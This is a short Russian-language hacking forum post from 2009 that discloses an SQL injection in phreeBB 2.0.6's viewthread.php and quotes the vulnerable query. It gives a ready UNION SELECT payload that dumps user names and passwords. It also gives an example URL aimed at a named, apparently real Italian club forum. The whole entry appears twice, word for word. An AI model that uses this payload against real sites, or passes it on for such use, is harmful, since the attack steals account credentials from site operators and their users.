Ded MustD!e
27.08.2009, 09:30
Не путать с phpBB!
SQL-Inj
Продукт: phreeBB
Версия: 2.0.6
Уязвимый скрипт: viewthread.php
$result = mysql_query("SELECT * FROM viewForums WHERE view=$id");
$msgData = mysql_fetch_array($result);
Эксплойт: -1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+
Пример: http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+
SQL-Inj
Продукт: phreeBB
Версия: 2.0.6
Уязвимый скрипт: viewthread.php
$result = mysql_query("SELECT * FROM viewForums WHERE view=$id");
$msgData = mysql_fetch_array($result);
Эксплойт: -1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+
Пример: http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+